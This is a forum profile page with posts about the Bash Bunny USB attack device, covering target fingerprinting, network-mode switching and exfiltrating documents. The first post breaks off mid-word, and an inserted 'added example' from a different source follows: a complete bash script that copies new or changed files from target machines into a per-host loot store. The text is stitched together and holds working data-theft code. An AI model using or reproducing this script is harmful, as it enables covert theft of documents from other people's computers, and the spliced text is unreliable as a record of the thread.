rynojvr

Members
  • Posts

    5
  • Joined

  • Last visited

Posts posted by rynojvr

  1. I hadn't really heard of p0f before, and am excited to try that out! :D

     

    In regard to the exfil, since the BB is quite the little gadget (thank you so much for this, Darren :]) there's the possibility to add some smarts. Keep a directory listing/db for each box the BB has hit, as well as a lookup of each file that was successfully exfilled, along with some metadata about that file (either a hash or a timestamp). If it sees it's the same box, only exfil new documents, or ones that have been modified?

     

    This also may be the wrong thread and I'll move it if I need to, but the RNDIS/ECM switching occurred to me yesterday and I got so amped about it I had to give it a shot. On my OSX the RNDIS failed (should've guessed that one) and the payload switched to ECM. The issue is that after sourcing bunny_helpers and attempting the nmap payload, the hostname was "nobody", and the nmap showed 0 open ports (after scanning for 3 seconds vs ~200 I would expect). Running the same payload but reversing the order of Ethernet adapters to ECM first conducted a successful sweep.

     

    Tha
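The "only exfil what is new or modified" idea from the post above, worked through as an added example. This is not code from the thread or from the Bash Bunny project; it assumes the target is identified by a caller-supplied HOST_ID (a real payload might derive it from the target's hostname or MAC), that loot is stored under a caller-supplied directory, and that each exfilled file is keyed by its relative path plus a SHA-256 hash, so an unchanged file is skipped and a modified one is re-copied and its manifest entry replaced.

```shell
#!/bin/bash
# Added example, not from the thread or the Bash Bunny project.
# Assumptions: HOST_ID is chosen by the caller; loot layout is
#   $LOOT/$HOST_ID/manifest   one line per exfilled file: "<sha256><TAB><relative path>"
#   $LOOT/$HOST_ID/files/     copies of the exfilled files under the same relative paths

hash_file() {
    # sha256sum on Linux (and the Bunny's Debian base), shasum on macOS
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# exfil_new LOOT_DIR HOST_ID SRC_DIR
# Walks SRC_DIR and copies every regular file that is absent from the host's
# manifest or whose hash differs from the recorded one, then updates the
# manifest. Prints the number of files copied on this run.
exfil_new() {
    loot="$1/$2"
    src="$3"
    manifest="$loot/manifest"
    mkdir -p "$loot/files"
    touch "$manifest"
    copied=0
    # list files into a temp file so the loop runs in this shell and $copied survives
    list=$(mktemp)
    find "$src" -type f > "$list"
    while IFS= read -r f; do
        rel="${f#"$src"/}"
        h=$(hash_file "$f")
        # same hash already recorded for this path: unchanged since last visit, skip it
        if grep -Fxq "$(printf '%s\t%s' "$h" "$rel")" "$manifest"; then
            continue
        fi
        mkdir -p "$loot/files/$(dirname "$rel")"
        cp "$f" "$loot/files/$rel"
        # drop any stale entry for this path (a modified file), then record the new hash
        awk -F'\t' -v p="$rel" '$2 != p' "$manifest" > "$manifest.tmp"
        printf '%s\t%s\n' "$h" "$rel" >> "$manifest.tmp"
        mv "$manifest.tmp" "$manifest"
        copied=$((copied + 1))
    done < "$list"
    rm -f "$list"
    echo "$copied"
}

# manifest_count LOOT_DIR HOST_ID : number of files currently tracked for a host
manifest_count() {
    wc -l < "$1/$2/manifest" | tr -d ' '
}
```

Keying the manifest on path plus hash (rather than a timestamp) means a file that is touched but not changed is not re-copied, while an edited file is picked up even if its mtime was reset; a second host gets its own manifest, so the same documents on a different box are treated as new.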

  2. As a brainstorming exercise, I was wondering if anyone had ideas on the quickest way to identify/fingerprint the target computer? Hypothetically, I'd be able to run the same payload against various targets, and customize the attack based on what type of computer I'm plugged in to (Windows/OSX/Win7/Win10/ElCap/Mint) and react accordingly.

    Would it then also be possible to identify a known computer I was talking to? My own station, for example. Possibly using a V2 of the UsbExfiltration payload which could be used repeatedly on a range of computers. Then as soon as the BB is filled, alert the attacker and let them know it's time to offload. The attacker would then plug it into their station and either the BB gets internet to upload the docs, or just offloads them to the local system and prepares itself for more extraction. 

    Having typed all that out, I suppose having an "Exfil" mode on Switch1 and an "Offload" mode on Switch2 would simplify things considerably, but the general question stands: What is the best way to quickly identify the type of Target Host to then react accordingly?

  3. Having played with the Bash Bunny, I can say that the boot-up time is SERIOUSLY impressive. 

     

    It's also worth considering that when you specify "ATTACKMODE RNDIS_ETHERNET", and the like, "ATTACKMODE" is kept as an executable on the BB itself, and IIRC is itself just a bash script. Part of what it does when you select one of the ETHERNET modes is create an authoritative DHCP server, register as the specified device, and wait to ensure the target successfully takes out a lease. I'll attempt to verify what happens if the statement times out (can't remember if the payload errors, or if it just times out no-worries-mate-I-got-ya-style and keeps going). In situations like this, there may be some additional care to be taken.

     

    However, if you could start a payload on the BB using a battery, and if there were some directive like "WAIT_FOR_INSERT"... You might be able to offload the startup of a larger attack/server/payload/db/what have you. Definitely interested to see what you come up with. Who knows, might be a selling feature in BB2.0 :)

     

     
